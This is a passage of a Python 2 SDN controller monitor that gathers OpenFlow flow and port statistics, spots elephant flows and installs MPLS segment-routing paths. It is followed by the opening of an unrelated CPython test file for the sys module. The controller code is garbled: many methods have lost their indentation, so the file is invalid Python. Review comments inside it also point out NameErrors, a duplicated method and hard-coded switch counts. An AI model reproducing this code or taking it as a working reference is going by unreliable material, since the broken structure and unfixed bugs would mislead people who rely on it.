                    swPair=f[(src,dst)]
            # NOTE(review): swPair stays unbound when no entry matched above,
            # which makes the self.flows assignment below raise NameError.
            key = (stat.priority,src,dst)
            value = (stat.packet_count, stat.byte_count,
                     stat.duration_sec, stat.duration_nsec)
            self._save_stats(self.flow_stats[dpid], key, value, 5)
            # Get flow's speed and Save it.
            pre = 0
            period = setting.MONITOR_PERIOD
            tmp = self.flow_stats[dpid][key]
            if len(tmp) > 1:
                pre = tmp[-2][1]
                period = self._get_period(tmp[-1][2], tmp[-1][3], tmp[-2][2], tmp[-2][3])
            speed = self._get_speed(self.flow_stats[dpid][key][-1][1], pre, period)
            self._save_stats(self.flow_speed[dpid], key, speed, 5)
            # Record flows that need to be rescheduled. (hmc)
            # A flow is an elephant when it uses over 10% of link capacity.
            flowDemand = speed * 8.0 / (setting.MAX_CAPACITY * 1024)
            if flowDemand >0.1:
                self.flows[key]={'src': src, 'dst': dst,'speed':speed,'priority': stat.priority,'swPair':swPair}
        # Estimate flows' demands if all the flow_stat replies are received.
        # NOTE(review): 8 is presumably the switch count of the test
        # topology — confirm and consider deriving from self.datapaths.
        if len(self.statRecord)==8 and self.flows:
            flows = sorted([flow for flow in self.flows.values()], key=lambda flow: (flow['src'], flow['dst']))
            # hostsList = sorted(self.hostsList)
            # self._demandEstimator(flows, hostsList)
            #if self.congested==1:
            print("it is time to reroute!")
            #self._demandEstimator(flows,hostsList)
            # self._reroute(flows)
        else:
            pass
def _demandEstimator(self,flows,hostsList):
estimated_flows = demand_estimation(flows, hostsList)
self._reroute(estimated_flows)
    def _reroute(self, flows):
        """
        Run the GA over the current elephant flows and install each chosen
        route on a worker thread pinned to one of the four core switches.

        NOTE(review): 'import GA_compute' is commented out at the top of
        this file, so the GA_compute._GA_start call below raises NameError
        whenever more than one flow is present — confirm the intended
        import.
        """
        # estimated_flows = demand_estimation(flows, hostsList)
        self.traffics={}
        count=0
        j=0
        route_list=[]
        for flow in flows:
            # Cache the candidate shortest paths per switch pair.
            self.paths[flow['swPair']]=self._ip2sw(flow['swPair'])
            self.traffics[count]=flow
            count=count+1
        currentFlows=self.traffics
        flow_len=len(currentFlows)
        if flow_len > 1:
            start = time.time()
            route_list=GA_compute._GA_start(flow_len)
            end = time.time()
            print("computing time "+str(end-start))
        if route_list != []:
            for k in route_list:
                flow = currentFlows[j]
                j = j + 1
                # Map the GA's route index onto core switch dpids 1001-1004.
                core = 1001 + k % 4
                Thread(target=NetworkMonitor._GlobalFirstFit,args=(self,flow,core)).start()
def _ip2sw(self,swPair):
src_dp = swPair[0]
dst_dp = swPair[1]
paths = self.awareness.shortest_paths.get(src_dp).get(dst_dp)
return paths
def swToSegments(self,path):
datapaths=self.datapaths
link_to_port=self.awareness.link_to_port
first_dp = datapaths[path[0]]
portList = [] # it includes all push mpls labels of the path
Pathlen = len(path)
if Pathlen == '':
self.logger.info("Path error!")
return
port_pair = self.get_port_pair_from_link(link_to_port, path[0], path[1])
if port_pair is None:
self.logger.info("Port not found in first hop.")
return
first_output = port_pair[0]
portList.append(first_output)
for i in xrange(1, Pathlen - 1):
port_next = self.get_port_pair_from_link(link_to_port, path[i], path[i + 1])
if port_next:
port = port_next[0]
portList.append(port)
return first_dp,portList
def _GlobalFirstFit(self,flow,core):
'''
Do the Hedera Global First Fit here.
self.awareness.link_to_port = {(src_dpid,dst_dpid):(src_port,dst_port),}
self.free_bandwidth = {dpid:{port_no:free_bw,},} Unit:Kbit/s
'''
src_ip=flow['src']
dst_ip=flow['dst']
paths=self._ip2sw(src_ip,dst_ip)
for path in paths:
if path[int((len(path) - 1) / 2)] == core:
bucket=self.swToSegments(path)
self._install_GFF_path(bucket, flow['match'], flow['priority'])
def _install_GFF_path(self, bucket, match, priority):
'''
Installing the Global First Fit path.
"match": {"dl_type": 2048, "in_port": 3,
"ipv4_src": "10.1.0.1", "ipv4_dst": "10.8.0.2"}
flow_info = (eth_type, src_ip, dst_ip, priority)
'''
flow_info = (match['eth_type'], match['ipv4_src'], match['ipv4_dst'], priority)
# Install flow entries to datapaths along the path.
self.Segment_forwarding(flow_info,bucket)
    def Segment_forwarding(self,flow_info,bucket):
        """
        Install one flow entry on the path's first switch that pushes the
        remaining hops' output ports as an MPLS label stack and forwards
        out of the first hop's port.

        :param flow_info: (eth_type, src_ip, dst_ip, priority)
        :param bucket: (first_datapath, port list) from swToSegments.
        """
        datapath=bucket[0]
        segmentStack=bucket[1]
        ofproto=datapath.ofproto
        parser = datapath.ofproto_parser
        eth_mpls=ethernet.ether.ETH_TYPE_MPLS
        actions = []
        # Pop ports from the tail: every port except the first hop's becomes
        # a pushed MPLS label (downstream switches pop them to forward).
        while len(segmentStack)>1:
            mpls_label=segmentStack.pop()
            f_label = datapath.ofproto_parser.OFPMatchField.make(datapath.ofproto.OXM_OF_MPLS_LABEL, mpls_label)
            actions.append(parser.OFPActionPushMpls(eth_mpls))
            actions.append(parser.OFPActionSetField(f_label))
        # The last remaining entry is the first hop's own output port.
        actions.append(parser.OFPActionOutput(segmentStack.pop(),0))
        inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS, actions)]
        match = parser.OFPMatch(
            eth_type=flow_info[0],ipv4_src=flow_info[1], ipv4_dst=flow_info[2]
        )
        # Priority above the existing entry so this route takes precedence;
        # short idle timeout lets the route expire when the flow ends.
        mod = parser.OFPFlowMod(datapath=datapath, priority=flow_info[-1]+1,
                                table_id=0,
                                idle_timeout=2,
                                hard_timeout=0,
                                match=match, instructions=inst)
        datapath.send_msg(mod)
    def install_flow(self, datapaths, link_to_port, path, flow_info):
        '''
        Install flow entries for datapaths.
        path=[dpid1, dpid2, ...]
        flow_info = (eth_type, src_ip, dst_ip, priority)
        self.awareness.access_table = {(sw,port):(ip, mac),}
        '''
        if path is None or len(path) == 0:
            self.logger.info("Path error!")
            return
        in_port = None
        # Find the access port the source host (flow_info[1]) attaches to.
        for key in self.awareness.access_table.keys():
            if self.awareness.access_table[key][0] == flow_info[1]:
                in_port = key[1]
        first_dp = datapaths[path[0]]
        out_port = first_dp.ofproto.OFPP_LOCAL
        # Install flow entry for intermediate datapaths.
        # NOTE(review): the range stops at len(path) - 2, so the last two
        # switches on the path receive no entry here — confirm whether the
        # tail hops are meant to be handled elsewhere.
        for i in xrange(1, len(path) - 2) :
            port = self.get_port_pair_from_link(link_to_port, path[i - 1], path[i])
            port_next = self.get_port_pair_from_link(link_to_port, path[i], path[i + 1])
            if port and port_next:
                src_port, dst_port = port[1], port_next[0]
                datapath = datapaths[path[i]]
                self.send_flow_mod(datapath, flow_info, src_port, dst_port)
        # Install flow entry for the first datapath.
        port_pair = self.get_port_pair_from_link(link_to_port, path[0], path[1])
        if port_pair is None:
            self.logger.info("Port not found in first hop.")
            return
        out_port = port_pair[0]
        self.send_flow_mod(first_dp, flow_info, in_port, out_port)
    def get_port_pair_from_link(self, link_to_port, src_dpid, dst_dpid):
        """
        Get port pair of link, so that controller can install flow entry.
        link_to_port = {(src_dpid,dst_dpid):(src_port,dst_port),}

        NOTE(review): an identical method is defined again further down in
        this class; that later definition silently overrides this one, so
        this copy is dead code and one of the two should be removed.
        """
        if (src_dpid, dst_dpid) in link_to_port:
            return link_to_port[(src_dpid, dst_dpid)]
        else:
            self.logger.info("Link from dpid:%s to dpid:%s is not in links" %
                             (src_dpid, dst_dpid))
            return None
    def send_flow_mod(self, datapath, flow_info, src_port, dst_port):
        """
        Build flow entry, and send it to datapath.
        flow_info = (eth_type, src_ip, dst_ip, priority)

        A 7-element flow_info additionally carries
        (..., ip_proto, 'src'|'dst', l4_port) to match a TCP/UDP port.

        NOTE(review): when flow_info has an unexpected length, or its
        'src'/'dst' selector is neither value, 'match' is never assigned
        and the add_flow call below raises NameError — confirm callers
        always pass 4- or 7-element tuples.
        """
        parser = datapath.ofproto_parser
        actions = []
        actions.append(parser.OFPActionOutput(dst_port))
        if len(flow_info) == 7:
            # L4-aware match: flow_info[-3] is the IP protocol number.
            if flow_info[-3] == 6:
                # TCP, matching either the source or destination port.
                if flow_info[-2] == 'src':
                    match = parser.OFPMatch(
                        in_port=src_port, eth_type=flow_info[0],
                        ipv4_src=flow_info[1], ipv4_dst=flow_info[2],
                        ip_proto=6, tcp_src=flow_info[-1])
                elif flow_info[-2] == 'dst':
                    match = parser.OFPMatch(
                        in_port=src_port, eth_type=flow_info[0],
                        ipv4_src=flow_info[1], ipv4_dst=flow_info[2],
                        ip_proto=6, tcp_dst=flow_info[-1])
                else:
                    pass
            elif flow_info[-3] == 17:
                # UDP, matching either the source or destination port.
                if flow_info[-2] == 'src':
                    match = parser.OFPMatch(
                        in_port=src_port, eth_type=flow_info[0],
                        ipv4_src=flow_info[1], ipv4_dst=flow_info[2],
                        ip_proto=17, udp_src=flow_info[-1])
                elif flow_info[-2] == 'dst':
                    match = parser.OFPMatch(
                        in_port=src_port, eth_type=flow_info[0],
                        ipv4_src=flow_info[1], ipv4_dst=flow_info[2],
                        ip_proto=17, udp_dst=flow_info[-1])
                else:
                    pass
        elif len(flow_info) == 4:
            # L3-only match.
            match = parser.OFPMatch(
                in_port=src_port, eth_type=flow_info[0],
                ipv4_src=flow_info[1], ipv4_dst=flow_info[2])
        else:
            pass
        # Priority above the base entry so this route wins.
        priority = flow_info[3] + 1
        self.add_flow(datapath, priority, match, actions,
                      idle_timeout=15, hard_timeout=0)
def add_flow(self, dp, priority, match, actions, idle_timeout, hard_timeout):
"""
Send a flow entry to datapath.
"""
ofproto = dp.ofproto
parser = dp.ofproto_parser
inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS, actions)]
mod = parser.OFPFlowMod(datapath=dp, priority=priority,
idle_timeout=idle_timeout,
hard_timeout=hard_timeout,
match=match, instructions=inst)
# print(mod)
dp.send_msg(mod)
def get_port_pair_from_link(self, link_to_port, src_dpid, dst_dpid):
"""
Get port pair of link, so that controller can install flow entry.
link_to_port = {(src_dpid,dst_dpid):(src_port,dst_port),}
"""
if (src_dpid, dst_dpid) in link_to_port:
return link_to_port[(src_dpid, dst_dpid)]
else:
self.logger.info("Link from dpid:%s to dpid:%s is not in links" %
(src_dpid, dst_dpid))
return None
    @set_ev_cls(ofp_event.EventOFPPortStatsReply, MAIN_DISPATCHER)
    def _port_stats_reply_handler(self, ev):
        """
        Save port's stats information into self.port_stats.
        Calculate port speed and Save it.
        self.port_stats = {(dpid, port_no):[(tx_bytes, rx_bytes, rx_errors, duration_sec, duration_nsec),],}
        self.port_speed = {(dpid, port_no):[speed,],}
        Note: The transmit performance and receive performance are independent of a port.
        We calculate the load of a port only using tx_bytes.
        """
        body = ev.msg.body
        dpid = ev.msg.datapath.id
        self.stats['port'][dpid] = body
        self.current_free_bandwidth.setdefault(dpid,{})
        self.free_bandwidth.setdefault(dpid, {})
        for stat in sorted(body, key=attrgetter('port_no')):
            port_no = stat.port_no
            # Skip the switch's internal LOCAL port.
            if port_no != ofproto_v1_3.OFPP_LOCAL:
                key = (dpid, port_no)
                # Sample layout: (tx_bytes, tx_dropped, tx_errors,
                # tx_packets, rx_bytes, rx_errors, duration_sec,
                # duration_nsec)
                value = (stat.tx_bytes, stat.tx_dropped,stat.tx_errors,stat.tx_packets,stat.rx_bytes, stat.rx_errors,
                         stat.duration_sec, stat.duration_nsec)
                self._save_stats(self.port_stats, key, value, 5)
                # Get port speed and Save it.
                pre = 0
                pre1=()
                pre2=()
                period = setting.MONITOR_PERIOD
                tmp = self.port_stats[key]
                if len(tmp) > 1:
                    # Calculate only the tx_bytes, not the rx_bytes. (hmc)
                    pre = tmp[-2][0]
                    # Previous (tx_dropped, tx_packets) and
                    # (tx_errors, tx_packets) pairs for loss/error rates.
                    pre1=(tmp[-2][1],tmp[-2][3])
                    pre2=(tmp[-2][2],tmp[-2][3])
                    period = self._get_period(tmp[-1][-2], tmp[-1][-1], tmp[-2][-2], tmp[-2][-1])
                speed = self._get_speed(self.port_stats[key][-1][0], pre, period)
                loss=self._get_loss((self.port_stats[key][-1][1],self.port_stats[key][-1][3]),pre1,period)
                errors=self._get_errors((self.port_stats[key][-1][2],self.port_stats[key][-1][3]),pre2,period)
                self._save_stats(self.port_speed, key, speed, 5)
                port_state = self.port_features.get(dpid).get(port_no)
                if port_state:
                    # Port is up: publish the derived metrics to link_info.
                    self._save_freebandwidth(dpid, port_no, speed,port_state)
                    self._save_linksLoss(dpid,port_no,loss,port_state)
                    self._save_linksError(dpid,port_no,errors,port_state)
                else:
                    self.logger.info("Port is Down")
def get_sw(self, dpid, in_port, src, dst):
"""
Get pair of source and destination switches.
"""
src_sw = dpid
dst_sw = None
src_location = self.awareness.get_host_location(src) # src_location = (dpid, port)
if in_port in self.awareness.access_ports[dpid]:
if (dpid, in_port) == src_location:
src_sw = src_location[0]
else:
return None
dst_location = self.awareness.get_host_location(dst) # dst_location = (dpid, port)
if dst_location:
dst_sw = dst_location[0]
if src_sw and dst_sw:
return src_sw, dst_sw
else:
return None
    @set_ev_cls(ofp_event.EventOFPPortDescStatsReply, MAIN_DISPATCHER)
    def port_desc_stats_reply_handler(self, ev):
        """
        Save port description info.

        Records (config, state, curr_speed, max_speed) per port into
        self.port_features.
        """
        msg = ev.msg
        dpid = msg.datapath.id
        ofproto = msg.datapath.ofproto
        config_dict = {ofproto.OFPPC_PORT_DOWN: "Down",
                       ofproto.OFPPC_NO_RECV: "No Recv",
                       ofproto.OFPPC_NO_FWD: "No Farward",
                       ofproto.OFPPC_NO_PACKET_IN: "No Packet-in"}
        state_dict = {ofproto.OFPPS_LINK_DOWN: "Down",
                      ofproto.OFPPS_BLOCKED: "Blocked",
                      ofproto.OFPPS_LIVE: "Live"}
        ports = []
        for p in ev.msg.body:
            ports.append('port_no=%d hw_addr=%s name=%s config=0x%08x '
                         'state=0x%08x curr=0x%08x advertised=0x%08x '
                         'supported=0x%08x peer=0x%08x curr_speed=%d '
                         'max_speed=%d' %
                         (p.port_no, p.hw_addr,
                          p.name, p.config,
                          p.state, p.curr, p.advertised,
                          p.supported, p.peer, p.curr_speed,
                          p.max_speed))
            # NOTE(review): p.config/p.state are bitmasks; this dict lookup
            # only matches single-flag values and falls back to "up" when
            # several flags are set — confirm that is acceptable here.
            if p.config in config_dict:
                config = config_dict[p.config]
            else:
                config = "up"
            if p.state in state_dict:
                state = state_dict[p.state]
            else:
                state = "up"
            # Recording data.
            port_feature = (config, state, p.curr_speed,p.max_speed)
            self.port_features[dpid][p.port_no] = port_feature
    @set_ev_cls(ofp_event.EventOFPPortStatus, MAIN_DISPATCHER)
    def _port_status_handler(self, ev):
        """
        Handle the port status changed event.

        Logs (Python 2 print statements) when a port is added, deleted or
        modified on any switch.
        """
        msg = ev.msg
        ofproto = msg.datapath.ofproto
        reason = msg.reason
        dpid = msg.datapath.id
        port_no = msg.desc.port_no
        reason_dict = {ofproto.OFPPR_ADD: "added",
                       ofproto.OFPPR_DELETE: "deleted",
                       ofproto.OFPPR_MODIFY: "modified", }
        if reason in reason_dict:
            print "switch%d: port %s %s" % (dpid, reason_dict[reason], port_no)
        else:
            print "switch%d: Illeagal port state %s %s" % (dpid, port_no, reason)
def _request_stats(self, datapath):
"""
Sending request msg to datapath
"""
self.logger.debug('send stats request: %016x', datapath.id)
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
req = parser.OFPPortDescStatsRequest(datapath, 0)
datapath.send_msg(req)
# if(str(datapath.id)=='3'):
# req = parser.OFPFlowStatsRequest(datapath)
# datapath.send_msg(req)
req = parser.OFPPortStatsRequest(datapath, 0, ofproto.OFPP_ANY)
datapath.send_msg(req)
def get_min_bw_of_links(self, graph, path, min_bw):
"""
Getting bandwidth of path. Actually, the mininum bandwidth
of links is the path's bandwith, because it is the bottleneck of path.
"""
_len = len(path)
if _len > 1:
minimal_band_width = min_bw
for i in xrange(_len-1):
pre, curr = path[i], path[i+1]
if 'bandwidth' in graph[pre][curr]:
bw = graph[pre][curr]['bandwidth']
minimal_band_width = min(bw, minimal_band_width)
else:
continue
return minimal_band_width
else:
return min_bw
    def get_best_path_by_bw(self, graph, paths):
        """
        Get best path by comparing paths.
        Note: This function is called in EFattree module.

        For every (src, dst) pair, picks the candidate path whose
        bottleneck bandwidth is largest; records the winner in best_paths
        and its bottleneck value in capabilities.
        """
        capabilities = {}
        best_paths = copy.deepcopy(paths)
        for src in paths:
            for dst in paths[src]:
                if src == dst:
                    # Trivial path: a node reaches itself at full capacity.
                    best_paths[src][src] = [src]
                    capabilities.setdefault(src, {src: setting.MAX_CAPACITY})
                    capabilities[src][src] = setting.MAX_CAPACITY
                else:
                    max_bw_of_paths = 0
                    best_path = paths[src][dst][0]
                    for path in paths[src][dst]:
                        min_bw = setting.MAX_CAPACITY
                        min_bw = self.get_min_bw_of_links(graph, path, min_bw)
                        if min_bw > max_bw_of_paths:
                            max_bw_of_paths = min_bw
                            best_path = path
                    best_paths[src][dst] = best_path
                    capabilities.setdefault(src, {dst: max_bw_of_paths})
                    capabilities[src][dst] = max_bw_of_paths
        # self.capabilities and self.best_paths have no actual utility in this module.
        self.capabilities = capabilities
        self.best_paths = best_paths
        return capabilities, best_paths
    def create_static_bw_graph(self):
        """
        Save bandwidth data into networkx graph object.

        Stamps every edge with the static capacity MAX_CAPACITY*1024
        (Kbit/s) and returns the graph. On any failure (typically
        self.awareness not ready yet) it re-resolves the awareness app and
        returns its graph instead.
        """
        try:
            graph = self.awareness.graph
            for link in graph.edges():
                node1=link[0]
                node2=link[1]
                graph[node1][node2]['bandwidth']=setting.MAX_CAPACITY*1024
            return graph
        # NOTE(review): bare except also swallows KeyboardInterrupt etc.;
        # narrowing to Exception would be safer.
        except:
            self.logger.info("Create bw graph exception")
            if self.awareness is None:
                self.awareness = lookup_service_brick('awareness')
            return self.awareness.graph
def create_graph(self, link_info):
"""
Save bandwidth data into networkx graph object.
"""
try:
graph = self.awareness.graph
link_to_port = self.awareness.link_to_port
for link in link_to_port:
(src_dpid, dst_dpid) = link
(src_port, dst_port) = link_to_port[link]
if src_dpid in link_info['bandwidth'].keys() and dst_dpid in link_info['bandwidth'].keys():
bandwidth = link_info['bandwidth'][src_dpid][src_port]
loss= link_info['loss'][src_dpid][src_port]
errors=link_info['errors'][src_dpid][src_port]
# Add key:value pair of bandwidth into graph.
if graph.has_edge(src_dpid, dst_dpid):
# graph[src_dpid][dst_dpid]['bandwidth'] = setting.MAX_CAPACITY
graph[src_dpid][dst_dpid]['bandwidth'] = bandwidth
graph[src_dpid][dst_dpid]['loss'] = loss
graph[src_dpid][dst_dpid]['errors'] = errors
# else:
# graph.add_edge(src_dpid, dst_dpid)
# # graph[src_dpid][dst_dpid]['bandwidth'] = bandwidth
# # if (str(src_dpid).startswith('3') and str(dst_dpid).startswith('2')) or (str(src_dpid).startswith('2') and str(dst_dpid).startswith('3')):
# # graph[src_dpid][dst_dpid]['bandwidth'] = setting.MAX_CAPACITY*2
# # else:
# # graph[src_dpid][dst_dpid]['bandwidth'] = setting.MAX_CAPACITY
# graph[src_dpid][dst_dpid]['bandwidth'] = setting.MAX_CAPACITY
else:
if graph.has_edge(src_dpid, dst_dpid):
graph[src_dpid][dst_dpid]['bandwidth'] = 0
graph[src_dpid][dst_dpid]['loss'] = loss
graph[src_dpid][dst_dpid]['errors'] = errors
# else:
# graph.add_edge(src_dpid, dst_dpid)
# graph[src_dpid][dst_dpid]['bandwidth'] = 0
self.graph=graph
except:
self.logger.info("Create bw graph exception")
if self.awareness is None:
self.awareness = lookup_service_brick('awareness')
self.graph=self.awareness.graph
def _save_freebandwidth(self, dpid, port_no, speed,port_state):
"""
Calculate free bandwidth of port and Save it.
port_feature = (config, state, p.curr_speed)
self.port_features[dpid][p.port_no] = port_feature
self.free_bandwidth = {dpid:{port_no:free_bw,},}
"""
capacity = setting.MAX_CAPACITY # The true bandwidth of link, instead of 'curr_speed'.
free_bw = self._get_free_bw(capacity, speed)
if free_bw==0:
self.congested=True
# self.free_bandwidth[dpid].setdefault(port_no, None)
# self.free_bandwidth[dpid][port_no] = free_bw
self.link_info['bandwidth'].setdefault(dpid,{})
self.link_info['bandwidth'][dpid][port_no]=free_bw
def _save_linksLoss(self,dpid,port_no,loss,port_state):
self.link_info['loss'].setdefault(dpid,{})
self.link_info['loss'][dpid][port_no]=loss
def _save_linksError(self,dpid,port_no,errors,port_state):
self.link_info['errors'].setdefault(dpid,{})
self.link_info['errors'][dpid][port_no]=errors
def _save_stats(self, _dict, key, value, length=5):
if key not in _dict:
_dict[key] = []
_dict[key].append(value)
if len(_dict[key]) > length:
_dict[key].pop(0)
def _get_speed(self, now, pre, period):
if period:
return (now - pre) / (period)
else:
return 0
def _get_loss(self,now, pre, period):
if period:
try:
return (now[1]-pre[1])/(now[0]-pre[0])
except:
return 0
else:
return 0
def _get_errors(self,now, pre, period):
if period:
try:
return (now[1]-pre[1])/(now[0]-pre[0])
except:
return 0
else:
return 0
def _get_free_bw(self, capacity, speed):
# freebw: Kbit/s
return max(capacity - speed * 8 / 1024.0, 0)
def _get_time(self, sec, nsec):
return sec + nsec / 1000000000.0
def _get_period(self, n_sec, n_nsec, p_sec, p_nsec):
return self._get_time(n_sec, n_nsec) - self._get_time(p_sec, p_nsec)
    def show_topology(self):
        # Print the link_to_port adjacency matrix together with the bandwidth
        # currently stored on each graph edge (Python 2 print statements; the
        # trailing commas suppress newlines to build the matrix row by row).
        # It means the link_to_port table has changed.
        _graph = self.graph
        print "\n---------------------Link Port---------------------"
        print '%6s' % ('switch'),
        # Header row: one column per switch dpid, in sorted order.
        for node in sorted([node for node in _graph.nodes()], key=lambda node: node):
            print '%6d' % node,
        print
        for node1 in sorted([node for node in _graph.nodes()], key=lambda node: node):
            print '%6d' % node1,
            for node2 in sorted([node for node in _graph.nodes()], key=lambda node: node):
                # A directed link (node1, node2): print its (src_port, dst_port)
                # pair, then the edge's remaining bandwidth; '/' means no link.
                if (node1, node2) in self.awareness.link_to_port.keys():
                    print '%6s' % str(self.awareness.link_to_port[(node1, node2)]),
                    print('%6s' %str(_graph[node1][node2]['bandwidth']))
                else:
                    print '%6s' % '/',
            print
        print
    def show_stat(self, _type):
        '''
        Show statistics information according to data type.
        _type: 'port' / 'flow'
        '''
        # Honour the global display toggle.
        if setting.TOSHOW is False:
            return
        bodys = self.stats[_type]
        if _type == 'flow':
            print('\ndatapath '
                  'priority ip_src ip_dst '
                  ' packets bytes flow-speed(Kb/s)')
            print('-------- '
                  '-------- ------------ ------------ '
                  '--------- ----------- ----------------')
            for dpid in sorted(bodys.keys()):
                # Only user flows with IPv4 match fields; table-miss (priority 0)
                # and controller (65535) entries are skipped.
                for stat in sorted([flow for flow in bodys[dpid] if ((flow.priority not in [0, 65535]) and (flow.match.get('ipv4_src')) and (flow.match.get('ipv4_dst')))],
                                   key=lambda flow: (flow.priority, flow.match.get('ipv4_src'), flow.match.get('ipv4_dst'))):
                    # flow_speed history is in bytes/s; convert to Kbit/s.
                    print('%8d %8s %12s %12s %9d %11d %16.1f' % (
                        dpid,
                        stat.priority, stat.match.get('ipv4_src'), stat.match.get('ipv4_dst'),
                        stat.packet_count, stat.byte_count,
                        abs(self.flow_speed[dpid][(stat.priority, stat.match.get('ipv4_src'), stat.match.get('ipv4_dst'))][-1])*8/1000.0))
            print
        if _type == 'port':
            print('\ndatapath port '
                  ' rx-pkts rx-bytes '' tx-pkts tx-bytes '
                  ' port-bw(Kb/s) port-speed(b/s) port-freebw(Kb/s) '
                  ' port-state link-state')
            print('-------- ---- '
                  '--------- ----------- ''--------- ----------- '
                  '------------- --------------- ----------------- '
                  '---------- ----------')
            _format = '%8d %4x %9d %11d %9d %11d %13d %15.1f %17.1f %10s %10s'
            for dpid in sorted(bodys.keys()):
                for stat in sorted(bodys[dpid], key=attrgetter('port_no')):
                    # Skip the switch's local management port.
                    if stat.port_no != ofproto_v1_3.OFPP_LOCAL:
                        # NOTE(review): the port-bw column is hard-coded to 10000
                        # rather than read from configuration — confirm intended.
                        print(_format % (
                            dpid, stat.port_no,
                            stat.rx_packets, stat.rx_bytes,
                            stat.tx_packets, stat.tx_bytes,
                            10000,
                            abs(self.port_speed[(dpid, stat.port_no)][-1] * 8),
                            self.free_bandwidth[dpid][stat.port_no],
                            self.port_features[dpid][stat.port_no][0],
                            self.port_features[dpid][stat.port_no][1]))
            print
|
test_sys.py | # -*- coding: iso-8859-1 -*-
import unittest, test.test_support
import sys, cStringIO
class SysModuleTest(unittest.TestCase):
    """Exercise the sys module's hooks, limits and introspection APIs (Python 2)."""
    def test_original_displayhook(self):
        # sys.__displayhook__ prints non-None values and binds them to __builtin__._
        import __builtin__
        savestdout = sys.stdout
        out = cStringIO.StringIO()
        sys.stdout = out
        dh = sys.__displayhook__
        self.assertRaises(TypeError, dh)
        if hasattr(__builtin__, "_"):
            del __builtin__._
        dh(None)
        self.assertEqual(out.getvalue(), "")
        self.assert_(not hasattr(__builtin__, "_"))
        dh(42)
        self.assertEqual(out.getvalue(), "42\n")
        self.assertEqual(__builtin__._, 42)
        # With sys.stdout missing entirely, the hook must raise RuntimeError.
        del sys.stdout
        self.assertRaises(RuntimeError, dh, 42)
        sys.stdout = savestdout
    def test_lost_displayhook(self):
        # Evaluating an expression statement without sys.displayhook raises RuntimeError.
        olddisplayhook = sys.displayhook
        del sys.displayhook
        code = compile("42", "<string>", "single")
        self.assertRaises(RuntimeError, eval, code)
        sys.displayhook = olddisplayhook
    def test_custom_displayhook(self):
        # A user-installed displayhook is invoked and its exception propagates.
        olddisplayhook = sys.displayhook
        def baddisplayhook(obj):
            raise ValueError
        sys.displayhook = baddisplayhook
        code = compile("42", "<string>", "single")
        self.assertRaises(ValueError, eval, code)
        sys.displayhook = olddisplayhook
    def test_original_excepthook(self):
        # sys.__excepthook__ writes the formatted traceback to sys.stderr.
        savestderr = sys.stderr
        err = cStringIO.StringIO()
        sys.stderr = err
        eh = sys.__excepthook__
        self.assertRaises(TypeError, eh)
        try:
            raise ValueError(42)
        except ValueError, exc:
            eh(*sys.exc_info())
        sys.stderr = savestderr
        self.assert_(err.getvalue().endswith("ValueError: 42\n"))
    # FIXME: testing the code for a lost or replaced excepthook in
    # Python/pythonrun.c::PyErr_PrintEx() is tricky.
    def test_exc_clear(self):
        # sys.exc_clear() resets the thread's current-exception state.
        self.assertRaises(TypeError, sys.exc_clear, 42)
        # Verify that exc_info is present and matches exc, then clear it, and
        # check that it worked.
        def clear_check(exc):
            typ, value, traceback = sys.exc_info()
            self.assert_(typ is not None)
            self.assert_(value is exc)
            self.assert_(traceback is not None)
            sys.exc_clear()
            typ, value, traceback = sys.exc_info()
            self.assert_(typ is None)
            self.assert_(value is None)
            self.assert_(traceback is None)
        def clear():
            try:
                raise ValueError, 42
            except ValueError, exc:
                clear_check(exc)
        # Raise an exception and check that it can be cleared
        clear()
        # Verify that a frame currently handling an exception is
        # unaffected by calling exc_clear in a nested frame.
        try:
            raise ValueError, 13
        except ValueError, exc:
            typ1, value1, traceback1 = sys.exc_info()
            clear()
            typ2, value2, traceback2 = sys.exc_info()
            self.assert_(typ1 is typ2)
            self.assert_(value1 is exc)
            self.assert_(value1 is value2)
            self.assert_(traceback1 is traceback2)
        # Check that an exception can be cleared outside of an except block
        clear_check(exc)
    def test_exit(self):
        # sys.exit raises SystemExit carrying its argument as .code.
        self.assertRaises(TypeError, sys.exit, 42, 42)
        # call without argument
        try:
            sys.exit(0)
        except SystemExit, exc:
            self.assertEquals(exc.code, 0)
        except:
            self.fail("wrong exception")
        else:
            self.fail("no exception")
        # call with integer argument
        try:
            sys.exit(42)
        except SystemExit, exc:
            self.assertEquals(exc.code, 42)
        except:
            self.fail("wrong exception")
        else:
            self.fail("no exception")
        # call with tuple argument with one entry
        # entry will be unpacked
        try:
            sys.exit((42,))
        except SystemExit, exc:
            self.assertEquals(exc.code, 42)
        except:
            self.fail("wrong exception")
        else:
            self.fail("no exception")
        # call with string argument
        try:
            sys.exit("exit")
        except SystemExit, exc:
            self.assertEquals(exc.code, "exit")
        except:
            self.fail("wrong exception")
        else:
            self.fail("no exception")
        # call with tuple argument with two entries
        try:
            sys.exit((17, 23))
        except SystemExit, exc:
            self.assertEquals(exc.code, (17, 23))
        except:
            self.fail("wrong exception")
        else:
            self.fail("no exception")
        # test that the exit machinery handles SystemExits properly
        import subprocess
        # both unnormalized...
        rc = subprocess.call([sys.executable, "-c",
                              "raise SystemExit, 46"])
        self.assertEqual(rc, 46)
        # ... and normalized
        rc = subprocess.call([sys.executable, "-c",
                              "raise SystemExit(47)"])
        self.assertEqual(rc, 47)
    def test_getdefaultencoding(self):
        if test.test_support.have_unicode:
            self.assertRaises(TypeError, sys.getdefaultencoding, 42)
            # can't check more than the type, as the user might have changed it
            self.assert_(isinstance(sys.getdefaultencoding(), str))
    # testing sys.settrace() is done in test_trace.py
    # testing sys.setprofile() is done in test_profile.py
    def test_setcheckinterval(self):
        # setcheckinterval/getcheckinterval round-trip for several values.
        self.assertRaises(TypeError, sys.setcheckinterval)
        orig = sys.getcheckinterval()
        for n in 0, 100, 120, orig: # orig last to restore starting state
            sys.setcheckinterval(n)
            self.assertEquals(sys.getcheckinterval(), n)
    def test_recursionlimit(self):
        # setrecursionlimit/getrecursionlimit round-trip; negative values rejected.
        self.assertRaises(TypeError, sys.getrecursionlimit, 42)
        oldlimit = sys.getrecursionlimit()
        self.assertRaises(TypeError, sys.setrecursionlimit)
        self.assertRaises(ValueError, sys.setrecursionlimit, -42)
        sys.setrecursionlimit(10000)
        self.assertEqual(sys.getrecursionlimit(), 10000)
        sys.setrecursionlimit(oldlimit)
    def test_getwindowsversion(self):
        # Windows-only API: a 5-tuple of four ints and a string.
        if hasattr(sys, "getwindowsversion"):
            v = sys.getwindowsversion()
